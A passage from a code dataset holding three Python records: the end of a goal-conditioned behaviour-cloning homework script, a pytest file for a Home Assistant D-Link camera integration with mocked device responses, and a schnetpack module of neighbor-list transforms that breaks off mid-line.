actions).float().mean()\n\t\t\t\tloss.backward()\n\t\t\t\tself.model_optimizer.step()\n\t\t\t\tself.model_optimizer.zero_grad()\n\n\t\t\t\tepoch_loss += loss.item()\n\t\t\t\tepoch_acc += acc.item()\n\t\t\t# print(f\"Epoch {epoch}: loss {epoch_loss / len(dataloader)}, acc {epoch_acc / len(dataloader)}\")\n\n\t\tepoch_loss = epoch_loss / len(dataloader)\n\t\tepoch_acc = epoch_acc / len(dataloader)\n\t\treturn epoch_loss, epoch_acc\n\n\tdef gen_dataset(self):\n\t\treturn GCDataset(self._train_states, self._train_actions)\n\ndef gcbc_policy(gcbc: GCBC):\n\tdef _policy(state_goal_vec):\n\t\tinput = torch.tensor(state_goal_vec).float()\n\t\tout = gcbc.model(input)\n\t\taction = out.argmax(dim=0)\n\t\treturn action.item()\n\treturn _policy\n\ndef evaluate_gc(env, policy, n_episodes=50):\n\tsuccs = 0\n\tfor _ in range(n_episodes):\n\t\tgoal_reached = generate_gc_episode(env, policy)\n\t\tif goal_reached:\n\t\t\tsuccs += 1\n\t\t# WRITE CODE HERE\n\t\t# END\n\tsuccs /= n_episodes\n\treturn succs\n\n\ndef generate_gc_episode(env, policy):\n\t\"\"\"Collects one rollout from the policy in an environment. The environment\n\tshould implement the OpenAI Gym interface. A rollout ends when done=True. The\n\tnumber of states and actions should be the same, so you should not include\n\tthe final state when done=True.\n\tArgs:\n\t\tenv: an OpenAI Gym environment.\n\t\tpolicy: a trained model\n\tReturns:\n\t\"\"\"\n\tdone = False\n\ts_g = env.reset()\n\n\twhile not done:\n\t\taction = policy(s_g)\n\t\ts_g, reward, done, goal_reached = env.step(action)\n\t\t# WRITE CODE HERE\n\t\t# END\n\treturn goal_reached\n\ndef generate_random_trajs(env, N=1000):\n\trandom_trajs = []\n\trandom_actions = []\n\trandom_goals = []\n\n\t# WRITE CODE HERE\n\tfor _ in range(N):\n\t\tactions = []\n\t\tgoals = []\n\t\tdone = False\n\t\ts_g = env.reset()\n\t\ttraj = [s_g[:2]]\n\t\twhile not done:\n\t\t\taction = env.action_space.sample()\n\t\t\ts_g, reward, done, goal_reached = env.step(action)\n\t\t\ttraj.append(s_g[:2])\n\t\t\tgoals.append(s_g[2:])\n\t\t\tactions.append(action)\n\t\trandom_trajs.append(traj)\n\t\trandom_actions.append(actions)\n\t\trandom_goals.append(goals)\n\t# END\n\t# You should obtain random_trajs, random_actions, random_goals from random policy\n\n\t# train GCBC based on the previous code\n\t# WRITE CODE HERE\n\treturn random_trajs, random_actions, random_goals\n\ndef run_GCBC(env, mode='relabel', num_seeds=5, num_iters=150, num_epochs=2, batch_size=256, num_workers=1, relabel_one_future=True):\n\t# mode = 'vanilla'\n\tloss_vecs = []\n\tacc_vecs = []\n\tsucc_vecs = []\n\n\tfor i in range(num_seeds):\n\t\tprint('*' * 50)\n\t\tprint('seed: %d' % i)\n\t\tloss_vec = []\n\t\tacc_vec = []\n\t\tsucc_vec = []\n\t\t# generate new set of trajectories\n\t\t# obtain either expert or random trajectories\n\t\tif mode == \"random_vanilla\" or mode == \"random_relabel\":\n\t\t\texpert_trajs, expert_actions, expert_original_goals = generate_random_trajs(env, 1000)\n\t\telif mode == \"vanilla\" or mode == \"relabel\":\n\t\t\texpert_trajs, expert_actions = shortest_path_expert(env, render=False)\n\t\t\texpert_original_goals = None # no need to record original goals; infer from the last state\n\t\telse:\n\t\t\traise ValueError(\"wrong mode\")\n\n\t\tgcbc = GCBC(env, expert_trajs, expert_actions, num_workers=num_workers, expert_original_goals=expert_original_goals)\n\t\t\n\t\tif mode == 'vanilla':\n\t\t\tgcbc.generate_behavior_cloning_data()\n\t\telif mode == 'relabel':\n\t\t\tgcbc.generate_relabel_data(relabel_one_future=relabel_one_future)\n\t\telif mode == 'random_vanilla':\n\t\t\tgcbc.generate_random_policy_vanilla_data()\n\t\telif mode == 'random_relabel':\n\t\t\tgcbc.generate_random_policy_relabel_data(relabel_one_future=relabel_one_future)\n\t\telse:\n\t\t\traise NotImplementedError()\n\t\tdataset = gcbc.gen_dataset()\n\t\tdataloader = DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=gcbc.num_workers)\n\t\tprint(\"total train samples:\", len(gcbc._train_states))\n\t\tfor e in tqdm(range(num_iters)):\n\n\t\t\t# # relabeling at after each iters? No effect on results\n\t\t\t# if mode == 'random_relabel':\n\t\t\t# \tgcbc.generate_random_policy_relabel_data(relabel_one_future=relabel_one_future)\n\t\t\t# elif mode == 'relabel':\n\t\t\t# \tgcbc.generate_relabel_data(relabel_one_future=relabel_one_future)\n\t\t\tloss, acc = gcbc.train(dataloader, num_epochs=num_epochs, batch_size=batch_size)\n\t\t\tsucc = evaluate_gc(env, gcbc_policy(gcbc))\n\t\t\tloss_vec.append(loss)\n\t\t\tacc_vec.append(acc)\n\t\t\tsucc_vec.append(succ)\n\t\t\tif e %10 == 0:\n\t\t\t\tprint(\"iter: %d, loss: %.4f, acc: %.4f, succ: %.4f\" % (e, loss, acc, succ))\n\t\tloss_vecs.append(loss_vec)\n\t\tacc_vecs.append(acc_vec)\n\t\tsucc_vecs.append(succ_vec)\n\n\tloss_vec = np.mean(np.array(loss_vecs), axis = 0).tolist()\n\tacc_vec = np.mean(np.array(acc_vecs), axis = 0).tolist()\n\tsucc_vec = np.mean(np.array(succ_vecs), axis = 0).tolist()\n\n\t### Plot the results\n\tfrom scipy.ndimage import uniform_filter\n\t# you may use uniform_filter(succ_vec, 5) to smooth succ_vec\n\t# plt.figure(figsize=(12, 3))\n\tsmoothed_succ_vec = uniform_filter(succ_vec, 5)\n\tfigure, axes = plt.subplots(2, 2, figsize=(32, 32))\n\tflattened_axes = [axes[i, j] for i in range(2) for j in range(2)]\n\t# WRITE CODE HERE\n\tfor ax, vec, title in zip(flattened_axes, [loss_vec, acc_vec, succ_vec, smoothed_succ_vec], ['loss', 'acc', 'succ', 'succ_smoothed']):\n\t\tax.plot(vec)\n\t\tax.set_title(title)\n\t\tif title == \"succ\":\n\t\t\tax.set_ylim(0, 1)\n\t# END\n\tplt.title('p2_gcbc_%s.png' % mode)\n\tplt.savefig('p2_gcbc_%s.png' % mode, dpi=300)\n\tplt.show()\n\n\nif __name__ == '__main__':\n\t# build env\n\tl, T = 5, 30\n\tenv = FourRooms(l, T)\n\tenv.reset()\n\tprint(\"env action space: \", env.action_space)\n\tprint(\"env map: \", env.map)\n\tenv.s = np.array([1, 1], dtype=int)\n\tenv.g = np.array([0, 8], dtype=int)\n\tprint(\"env sample goal\", env.g)\n\tprint(\"env sample state\", env.s)\n\n\t# test shortest traj\n\t# shortest_traj, shortest_actions = compute_shortest_path(env)\n\t# print(\"shortest_traj: \", shortest_traj)\n\t# print(\"shortest_actions: \", shortest_actions)\n\t# shortest_path_expert(env, render=True)\n\n\t### Visualize the map\n\n\t# env.render_map()\n\t# run_GCBC()","repo_name":"dummyindex/cmu-10703-reinforcement-learning","sub_path":"F22_10703_HW3/impl/p3-templates/GCBC.py","file_name":"GCBC.py","file_ext":"py","file_size_in_byte":17706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28951636457","text":"\"\"\"Tests for the binary sensor module.\"\"\"\nimport asyncio\nimport logging\nimport pytest\n\nfrom datetime import timedelta\nfrom homeassistant.const import (\n CONF_AUTHENTICATION,\n CONF_NAME,\n CONF_PASSWORD,\n CONF_SCAN_INTERVAL,\n CONF_URL,\n CONF_USERNAME,\n CONF_VERIFY_SSL,\n HTTP_BASIC_AUTHENTICATION,\n STATE_UNKNOWN,\n)\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator\nfrom pytest_httpx import IteratorStream\n\nfrom custom_components.nipca_custom.binary_sensor import NipcaMotionSensor, get_sensors\nfrom custom_components.nipca_custom.const import (\n COMMON_INFO,\n MOTION_INFO,\n NOTIFY_STREAM,\n STREAM_INFO,\n)\nfrom custom_components.nipca_custom.nipca import NipcaDevice\n\nfrom tests.conftest import TEST_URL\n\nURL_INFO_LINES = (\n f\"{TEST_URL}\"\n)\n\nCOMMON_INFO_LINES = \"\"\"\nmodel=DCS-2132LB1\nbrand=D-Link\nproduct=Workshop\nversion=2.13\nbuild=03\nhw_version=B\nnipca=1.9.5\nname=Workshop\nlocation=\nmacaddr=B0:C5:54:16:A5:21\nipaddr=192.168.100.63\nnetmask=255.255.255.0\ngateway=192.168.100.1\nipaddr1_v6=\nprefix1_v6=\ngateway_v6=\nwireless=yes\nptz=\nfocus=no\ninputs=1\noutputs=1\nspeaker=yes\nvideoout=no\npir=yes\nicr=yes\nir=yes\nmic=yes\nled=yes\ntd=no\nplaying_music=no\nwhitelightled=no\n\"\"\"\n\nSTREAM_INFO_LINES = \"\"\"\nvideos=MJPEG,H.264\ncodeclist1=MJPEG,H.264\ncodeclist2=MJPEG,H.264\ncodeclist3=MJPEG,H.264\ncodeclist4=MJPEG\naudios=G.711,AAC\naspectratios=16:9,4:3\nresolutions=1280x720,800x448,640x360,480x272,320x176\nresolutionlist1=1280x720,800x448,640x360,480x272,320x176\nresolutionlist2=1280x720,800x448,640x360,480x272,320x176\nresolutionlist3=640x360,320x176\nresolutionlist4=640x360\nvbitrates=4M,2M,1M,512K,256K,200K,128K,64K\nqualitymodes=CBR,Fixquality\nframerates=25,15,7,4,1\nframeratelist1=25,15,7,4,1\nframeratelist2=25,15,7,4,1\nframeratelist3=25,15,7,4,1\nframeratelist4=15\nqualities=Excellent,Good,Standard\nasamplerates=8\nabitrates=64\nmicvol=0...1\ncur_micvol=0\nspeakervol=1...10\ncur_speakervol=7\nvprofilenum=4\nvprofile1=MJPEG\nvprofileurl1=/video/mjpg.cgi?profileid=1\nvprofileres1=800x448\nvprofile2=H.264\nvprofileurl2=/video/ACVS-H264.cgi?profileid=2\nvprofileres2=1280x720\nvprofile3=H.264\nvprofileurl3=/video/ACVS-H264.cgi?profileid=3\nvprofileres3=320x176\nvprofile4=MJPEG\nvprofileurl4=/video/mjpg.cgi?profileid=4\nvprofileres4=640x360\naprofilenum=2\naprofile1=G.711\naprofileurl1=/audio/ACAS-ULAW.cgi\naprofile2=AAC\naprofileurl2=/audio/ACAS-AAC.cgi\nvDprofileurl1=/av2/mjpg.cgi?profileid=1\nvDprofileurl2=/av2/ACVS-H264.cgi?profileid=2\nvDprofileurl3=/av2/ACVS-H264.cgi?profileid=3\nvDprofileurl4=/av2/mjpg.cgi?profileid=4\naDprofileurl1=/av2/ACAS-ULAW.cgi\naDprofileurl2=/av2/ACAS-AAC.cgi\nvban=1|-|1280x720|25|-|-:3|-|800x448,1280x720|-|-|-:3|-|640x360|25|-|-:3|-|-|-|-|6144,8192:3|-|480x272|-|-|-\n\"\"\"\n\nCONFIG_MOTION_INFO_LINES = \"\"\"\nenable=yes\nmbmask=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\nsensitivity=75\npir=yes\npir_sensitivity=50\n\"\"\"\n\nMOTION_INFO_LINES = \"\"\"\nMotionDetectionEnable=1\nMotionDetectionBlockSet=0000000000000000000000000\nMotionDetectionSensitivity=90\nMotionDetectionScheduleMode=0\nMotionDetectionScheduleDay=0\nMotionDetectionScheduleTimeStart=00:00:00\nMotionDetectionScheduleTimeStop=00:00:00\n\"\"\"\n\nSTREAM_LINES = b\"\"\"\nmd1=off\nmdv1=0\npir=off\ninput1=off\nrecording=off\noutput1=off\nspeaker=on\nspeaker_occupied=off\nmic=on\nmic_muted=off\nirled=off\nled=on\naudio_detected=off\naudio_detect_val=14\ncameraname=Workshop\n\"\"\"\n\n\ndef test_get_binary_sensors():\n \"\"\"Test parsing sensors attributes.\"\"\"\n raw_data = {\n \"model\": \"DCS-2132LB1\",\n \"brand\": \"D-Link\",\n \"product\": \"test\",\n \"version\": \"2.13\",\n \"build\": \"03\",\n \"hw_version\": \"B\",\n \"nipca\": \"1.9.5\",\n \"name\": \"test\",\n \"location\": \"\",\n \"macaddr\": \"01:23:45:67:89:0A\",\n \"ipaddr\": \"192.168.0.2\",\n \"netmask\": \"255.255.255.0\",\n \"gateway\": \"192.168.0.1\",\n \"ipaddr1_v6\": \"\",\n \"prefix1_v6\": \"\",\n \"gateway_v6\": \"\",\n \"wireless\": \"yes\",\n \"ptz\": \"\",\n \"focus\": \"no\",\n \"inputs\": \"1\",\n \"outputs\": \"1\",\n \"speaker\": \"yes\",\n \"videoout\": \"no\",\n \"pir\": \"yes\",\n \"icr\": \"yes\",\n \"ir\": \"yes\",\n \"mic\": \"yes\",\n \"led\": \"yes\",\n \"td\": \"no\",\n \"playing_music\": \"no\",\n \"whitelightled\": \"no\",\n \"videos\": \"MJPEG,H.264\",\n \"codeclist1\": \"MJPEG,H.264\",\n \"codeclist2\": \"MJPEG,H.264\",\n \"codeclist3\": \"MJPEG,H.264\",\n \"codeclist4\": \"MJPEG\",\n \"audios\": \"G.711,AAC\",\n \"aspectratios\": \"16:9,4:3\",\n \"resolutions\": \"1280x720,800x448,640x360,480x272,320x176\",\n \"resolutionlist1\": \"1280x720,800x448,640x360,480x272,320x176\",\n \"resolutionlist2\": \"1280x720,800x448,640x360,480x272,320x176\",\n \"resolutionlist3\": \"640x360,320x176\",\n \"resolutionlist4\": \"640x360\",\n \"vbitrates\": \"4M,2M,1M,512K,256K,200K,128K,64K\",\n \"qualitymodes\": \"CBR,Fixquality\",\n \"framerates\": \"25,15,7,4,1\",\n \"frameratelist1\": \"25,15,7,4,1\",\n \"frameratelist2\": \"25,15,7,4,1\",\n \"frameratelist3\": \"25,15,7,4,1\",\n \"frameratelist4\": \"15\",\n \"qualities\": \"Excellent,Good,Standard\",\n \"asamplerates\": \"8\",\n \"abitrates\": \"64\",\n \"micvol\": \"0...1\",\n \"cur_micvol\": \"0\",\n \"speakervol\": \"1...10\",\n \"cur_speakervol\": \"7\",\n \"vprofilenum\": \"4\",\n \"vprofile1\": \"MJPEG\",\n \"vprofileurl1\": \"/video/mjpg.cgi?profileid=1\",\n \"vprofileres1\": \"800x448\",\n \"vprofile2\": \"H.264\",\n \"vprofileurl2\": \"/video/ACVS-H264.cgi?profileid=2\",\n \"vprofileres2\": \"1280x720\",\n \"vprofile3\": \"H.264\",\n \"vprofileurl3\": \"/video/ACVS-H264.cgi?profileid=3\",\n \"vprofileres3\": \"320x176\",\n \"vprofile4\": \"MJPEG\",\n \"vprofileurl4\": \"/video/mjpg.cgi?profileid=4\",\n \"vprofileres4\": \"640x360\",\n \"aprofilenum\": \"2\",\n \"aprofile1\": \"G.711\",\n \"aprofileurl1\": \"/audio/ACAS-ULAW.cgi\",\n \"aprofile2\": \"AAC\",\n \"aprofileurl2\": \"/audio/ACAS-AAC.cgi\",\n \"vdprofileurl1\": \"/av2/mjpg.cgi?profileid=1\",\n \"vdprofileurl2\": \"/av2/ACVS-H264.cgi?profileid=2\",\n \"vdprofileurl3\": \"/av2/ACVS-H264.cgi?profileid=3\",\n \"vdprofileurl4\": \"/av2/mjpg.cgi?profileid=4\",\n \"adprofileurl1\": \"/av2/ACAS-ULAW.cgi\",\n \"adprofileurl2\": \"/av2/ACAS-AAC.cgi\",\n \"vban\": \"1|-|1280x720|25|-|-:3|-|800x448,1280x720|-|-|-:3|-|640x360|25|-|-:3|-|-|-|-|6144,8192:3|-|480x272|-|-|-\",\n \"enable\": \"yes\",\n \"mbmask\": \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\",\n \"sensitivity\": \"75\",\n \"pir_sensitivity\": \"50\",\n }\n result = get_sensors(raw_data)\n assert result == [\n (\"motion\", \"md1\"),\n (\"sound\", \"audio_detected\"),\n (\"sound\", \"pir\"),\n (\"light\", \"led\"),\n (\"light\", \"irled\"),\n (None, \"input1\"),\n (None, \"output1\"),\n ]\n\n\n@pytest.mark.asyncio\nasync def test_binary_sensor_state(httpx_mock, hass):\n \"\"\"Test binary sensors state update.\"\"\"\n httpx_mock.add_response(url=TEST_URL, text=URL_INFO_LINES)\n httpx_mock.add_response(url=COMMON_INFO.format(TEST_URL), text=COMMON_INFO_LINES)\n httpx_mock.add_response(url=STREAM_INFO.format(TEST_URL), text=STREAM_INFO_LINES)\n httpx_mock.add_response(url=MOTION_INFO[0].format(TEST_URL), text=CONFIG_MOTION_INFO_LINES)\n httpx_mock.add_response(\n url=NOTIFY_STREAM.format(TEST_URL),\n stream=IteratorStream([STREAM_LINES]),\n )\n\n config = {\n CONF_URL: TEST_URL,\n CONF_AUTHENTICATION: HTTP_BASIC_AUTHENTICATION,\n CONF_USERNAME: \"test\",\n CONF_PASSWORD: \"test\",\n CONF_VERIFY_SSL: False,\n CONF_NAME: \"NIPCA Custom\",\n CONF_SCAN_INTERVAL: 10,\n }\n\n device = NipcaDevice(hass, config)\n await device.update_info()\n device.create_listener_task(hass)\n\n logger = logging.getLogger(__name__)\n coordinator = DataUpdateCoordinator(\n hass,\n logger,\n name=\"motion_sensor\",\n update_method=device.update_motion_sensors,\n update_interval=timedelta(seconds=config.get(CONF_SCAN_INTERVAL)),\n )\n device._coordinator = coordinator\n sensors = [\n NipcaMotionSensor(hass, device, coordinator, sensor_name, sensor_class)\n for sensor_class, sensor_name in get_sensors(device._attributes)\n ]\n\n async def wait_until_events_come():\n while len(device._events) < 15:\n await asyncio.sleep(0.1)\n\n await coordinator.async_refresh()\n for sensor in sensors:\n assert sensor.is_on == STATE_UNKNOWN\n\n await wait_until_events_come()\n await coordinator.async_refresh()\n\n for sensor in sensors:\n assert sensor.state != STATE_UNKNOWN\n assert sensor.is_on != STATE_UNKNOWN\n","repo_name":"uncle-yura/nipca_custom","sub_path":"tests/test_binary_sensor.py","file_name":"test_binary_sensor.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"33524329717","text":"import os\nimport torch\nimport shutil\nfrom ase import Atoms\nfrom ase.neighborlist import neighbor_list as ase_neighbor_list\nfrom matscipy.neighbours import neighbour_list as msp_neighbor_list\nfrom .base import Transform\nfrom dirsync import sync\nimport numpy as np\nfrom typing import Optional, Dict, List\n\n__all__ = [\n \"ASENeighborList\",\n \"MatScipyNeighborList\",\n \"TorchNeighborList\",\n \"CountNeighbors\",\n \"CollectAtomTriples\",\n \"CachedNeighborList\",\n \"NeighborListTransform\",\n \"WrapPositions\",\n \"SkinNeighborList\",\n \"FilterNeighbors\",\n]\n\nimport schnetpack as spk\nfrom schnetpack import properties\nimport fasteners\n\n\nclass CacheException(Exception):\n pass\n\n\nclass CachedNeighborList(Transform):\n \"\"\"\n Dynamic caching of neighbor lists.\n This wraps a neighbor list and stores the results the first time it is called\n for a dataset entry with the pid provided by AtomsDataset. Particularly,\n for large systems, this speeds up training significantly.\n\n Note:\n The provided cache location should be unique to the used dataset. Otherwise,\n wrong neighborhoods will be provided. The caching location can be reused\n across multiple runs, by setting `keep_cache=True`.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(\n self,\n cache_path: str,\n neighbor_list: Transform,\n nbh_transforms: Optional[List[torch.nn.Module]] = None,\n keep_cache: bool = False,\n cache_workdir: str = None,\n ):\n \"\"\"\n Args:\n cache_path: Path of caching directory.\n neighbor_list: the neighbor list to use\n nbh_transforms: transforms for manipulating the neighbor lists\n provided by neighbor_list\n keep_cache: Keep cache at `cache_location` at the end of training, or copy\n built/updated cache there from `cache_workdir` (if set). A pre-existing\n cache at `cache_location` will not be deleted, while a temporary cache\n at `cache_workdir` will always be removed.\n cache_workdir: If this is set, the cache will be build here, e.g. a cluster\n scratch space for faster performance. An existing cache at\n `cache_location` is copied here at the beginning of training, and\n afterwards (if `keep_cache=True`) the final cache is copied to\n `cache_workdir`.\n \"\"\"\n super().__init__()\n self.neighbor_list = neighbor_list\n self.nbh_transforms = nbh_transforms or []\n self.keep_cache = keep_cache\n self.cache_path = cache_path\n self.cache_workdir = cache_workdir\n self.preexisting_cache = os.path.exists(self.cache_path)\n self.has_tmp_workdir = cache_workdir is not None\n\n os.makedirs(cache_path, exist_ok=True)\n\n if self.has_tmp_workdir:\n # cache workdir should be empty to avoid loading nbh lists from earlier runs\n if os.path.exists(cache_workdir):\n raise CacheException(\"The provided `cache_workdir` already exists!\")\n\n # copy existing nbh lists to cache workdir\n if self.preexisting_cache:\n shutil.copytree(cache_path, cache_workdir)\n self.cache_location = cache_workdir\n else:\n # use cache_location to store and load neighborlists\n self.cache_location = cache_path\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n cache_file = os.path.join(\n self.cache_location, f\"cache_{inputs[properties.idx][0]}.pt\"\n )\n\n # try to read cached NBL\n try:\n data = torch.load(cache_file)\n inputs.update(data)\n except IOError:\n # acquire lock for caching\n lock = fasteners.InterProcessLock(\n os.path.join(\n self.cache_location, f\"cache_{inputs[properties.idx][0]}.lock\"\n )\n )\n with lock:\n # retry reading, in case other process finished in the meantime\n try:\n data = torch.load(cache_file)\n inputs.update(data)\n except IOError:\n # now it is save to calculate and cache\n inputs = self.neighbor_list(inputs)\n for nbh_transform in self.nbh_transforms:\n inputs = nbh_transform(inputs)\n data = {\n properties.idx_i: inputs[properties.idx_i],\n properties.idx_j: inputs[properties.idx_j],\n properties.offsets: inputs[properties.offsets],\n }\n torch.save(data, cache_file)\n except Exception as e:\n print(e)\n return inputs\n\n def teardown(self):\n if not self.keep_cache and not self.preexisting_cache:\n try:\n shutil.rmtree(self.cache_path)\n except:\n pass\n\n if self.cache_workdir is not None:\n if self.keep_cache:\n try:\n sync(self.cache_workdir, self.cache_path, \"sync\")\n except:\n pass\n\n try:\n shutil.rmtree(self.cache_workdir)\n except:\n pass\n\n\nclass NeighborListTransform(Transform):\n \"\"\"\n Base class for neighbor lists.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(\n self,\n cutoff: float,\n ):\n \"\"\"\n Args:\n cutoff: Cutoff radius for neighbor search.\n \"\"\"\n super().__init__()\n self._cutoff = cutoff\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n Z = inputs[properties.Z]\n R = inputs[properties.R]\n cell = inputs[properties.cell].view(3, 3)\n pbc = inputs[properties.pbc]\n\n idx_i, idx_j, offset = self._build_neighbor_list(Z, R, cell, pbc, self._cutoff)\n inputs[properties.idx_i] = idx_i.detach()\n inputs[properties.idx_j] = idx_j.detach()\n inputs[properties.offsets] = offset\n return inputs\n\n def _build_neighbor_list(\n self,\n Z: torch.Tensor,\n positions: torch.Tensor,\n cell: torch.Tensor,\n pbc: torch.Tensor,\n cutoff: float,\n ):\n \"\"\"Override with specific neighbor list implementation\"\"\"\n raise NotImplementedError\n\n\nclass ASENeighborList(NeighborListTransform):\n \"\"\"\n Calculate neighbor list using ASE.\n \"\"\"\n\n def _build_neighbor_list(self, Z, positions, cell, pbc, cutoff):\n at = Atoms(numbers=Z, positions=positions, cell=cell, pbc=pbc)\n\n idx_i, idx_j, S = ase_neighbor_list(\"ijS\", at, cutoff, self_interaction=False)\n idx_i = torch.from_numpy(idx_i)\n idx_j = torch.from_numpy(idx_j)\n S = torch.from_numpy(S).to(dtype=positions.dtype)\n offset = torch.mm(S, cell)\n return idx_i, idx_j, offset\n\n\nclass MatScipyNeighborList(NeighborListTransform):\n \"\"\"\n Neighborlist using the efficient implementation of the Matscipy package\n\n References:\n https://github.com/libAtoms/matscipy\n \"\"\"\n\n def _build_neighbor_list(\n self, Z, positions, cell, pbc, cutoff, eps=1e-6, buffer=1.0\n ):\n at = Atoms(numbers=Z, positions=positions, cell=cell, pbc=pbc)\n\n # Add cell if none is present (volume = 0)\n if at.cell.volume < eps:\n # max values - min values along xyz augmented by small buffer for stability\n new_cell = np.ptp(at.positions, axis=0) + buffer\n # Set cell and center\n at.set_cell(new_cell, scale_atoms=False)\n at.center()\n\n # Compute neighborhood\n idx_i, idx_j, S = msp_neighbor_list(\"ijS\", at, cutoff)\n idx_i = torch.from_numpy(idx_i).long()\n idx_j = torch.from_numpy(idx_j).long()\n S = torch.from_numpy(S).to(dtype=positions.dtype)\n offset = torch.mm(S, cell)\n\n return idx_i, idx_j, offset\n\n\nclass SkinNeighborList(Transform):\n \"\"\"\n Neighbor list provider utilizing a cutoff skin for computational efficiency. Wrapper\n around neighbor list classes such as, e.g., ASENeighborList. Designed for use cases\n with gradual structural changes such ase MD simulations and structure relaxations.\n\n Note:\n - Not meant to be used for training, since the shuffling of training data\n results in large structural deviations between subsequent training samples.\n - Not transferable between different molecule conformations or varying atom\n indexing.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(\n self,\n neighbor_list: Transform,\n nbh_transforms: Optional[List[torch.nn.Module]] = None,\n cutoff_skin: float = 0.3,\n ):\n \"\"\"\n Args:\n neighbor_list: the neighbor list to use\n nbh_transforms: transforms for manipulating the neighbor lists\n provided by neighbor_list\n cutoff_skin: float\n If no atom has moved more than cutoff_skin/2 since the neighbor list\n has been updated the last time, then the neighbor list is reused.\n This will save some expensive rebuilds of the list.\n \"\"\"\n\n super().__init__()\n\n self.neighbor_list = neighbor_list\n self.cutoff = neighbor_list._cutoff\n self.cutoff_skin = cutoff_skin\n self.neighbor_list._cutoff = self.cutoff + cutoff_skin\n self.nbh_transforms = nbh_transforms or []\n self.distance_calculator = spk.atomistic.PairwiseDistances()\n self.previous_inputs = {}\n\n # @timeit\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n\n update_required, inputs = self._update(inputs)\n inputs = self.distance_calculator(inputs)\n inputs = self._remove_neighbors_in_skin(inputs)\n\n return inputs\n\n def reset(self):\n self.previous_inputs = {}\n\n def _remove_neighbors_in_skin(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n\n Rij = inputs[properties.Rij]\n idx_i = inputs[properties.idx_i]\n idx_j = inputs[properties.idx_j]\n offsets = inputs[properties.offsets]\n\n rij = torch.norm(inputs[properties.Rij], dim=-1)\n cidx = torch.nonzero(rij <= self.cutoff).squeeze(-1)\n\n inputs[properties.Rij] = Rij[cidx]\n inputs[properties.idx_i] = idx_i[cidx]\n inputs[properties.idx_j] = idx_j[cidx]\n inputs[properties.offsets] = offsets[cidx]\n\n return inputs\n\n def _update(self, inputs):\n \"\"\"Make sure the list is up-to-date.\"\"\"\n\n # get sample index\n sample_idx = inputs[properties.idx].item()\n\n # check if previous neighbor list exists and make sure that this is not the\n # first update step\n if sample_idx in self.previous_inputs.keys():\n # load previous inputs\n previous_inputs = self.previous_inputs[sample_idx]\n # extract previous structure\n previous_positions = np.array(previous_inputs[properties.R], copy=True)\n previous_cell = np.array(\n previous_inputs[properties.cell].view(3, 3), copy=True\n )\n previous_pbc = np.array(previous_inputs[properties.pbc], copy=True)\n # extract current structure\n positions = inputs[properties.R]\n cell = inputs[properties.cell].view(3, 3)\n pbc = inputs[properties.pbc]\n # check if structure change is sufficiently small to reuse previous neighbor\n # list\n if (\n (previous_pbc == pbc.numpy()).any()\n and (previous_cell == cell.numpy()).any()\n and ((previous_positions - positions.numpy()) ** 2).sum(1).max()\n < 0.25 * self.cutoff_skin**2\n ):\n # reuse previous neighbor list\n inputs[properties.idx_i] = (\n previous_inputs[properties.idx_i].clone()\n )\n inputs[properties.idx_j] = (\n previous_inputs[properties.idx_j].clone()\n )\n inputs[properties.offsets] = (\n previous_inputs[properties.offsets].clone()\n )\n return False, inputs\n\n # build new neighbor list\n inputs = self._build(inputs)\n return True, inputs\n\n def _build(self, inputs):\n\n # apply all transforms to obtain new neighbor list\n inputs = self.neighbor_list(inputs)\n for nbh_transform in self.nbh_transforms:\n inputs = nbh_transform(inputs)\n\n # store new reference conformation and remove old one\n sample_idx = inputs[properties.idx].item()\n stored_inputs = {\n properties.R: inputs[properties.R].detach().clone(),\n properties.cell: inputs[properties.cell].detach().clone(),\n properties.pbc: inputs[properties.pbc].detach().clone(),\n properties.idx_i: inputs[properties.idx_i].detach().clone(),\n properties.idx_j: inputs[properties.idx_j].detach().clone(),\n properties.offsets: inputs[properties.offsets].detach().clone(),\n }\n self.previous_inputs.update({sample_idx: stored_inputs})\n\n return inputs\n\n\nclass TorchNeighborList(NeighborListTransform):\n \"\"\"\n Environment provider making use of neighbor lists as implemented in TorchAni\n\n Supports cutoffs and PBCs and can be performed on either CPU or GPU.\n\n References:\n https://github.com/aiqm/torchani/blob/master/torchani/aev.py\n \"\"\"\n\n def _build_neighbor_list(self, Z, positions, cell, pbc, cutoff):\n # Check if shifts are needed for periodic boundary conditions\n if torch.all(pbc == 0):\n shifts = torch.zeros(0, 3, device=cell.device, dtype=torch.long)\n else:\n shifts = self._get_shifts(cell, pbc, cutoff)\n idx_i, idx_j, offset = self._get_neighbor_pairs(positions, cell, shifts, cutoff)\n\n # Create bidirectional id arrays, similar to what the ASE neighbor_list returns\n bi_idx_i = torch.cat((idx_i, idx_j), dim=0)\n bi_idx_j = torch.cat((idx_j, idx_i), dim=0)\n\n # Sort along first dimension (necessary for atom-wise pooling)\n sorted_idx = torch.argsort(bi_idx_i)\n idx_i = bi_idx_i[sorted_idx]\n idx_j = bi_idx_j[sorted_idx]\n\n bi_offset = torch.cat((-offset, offset), dim=0)\n offset = bi_offset[sorted_idx]\n offset = 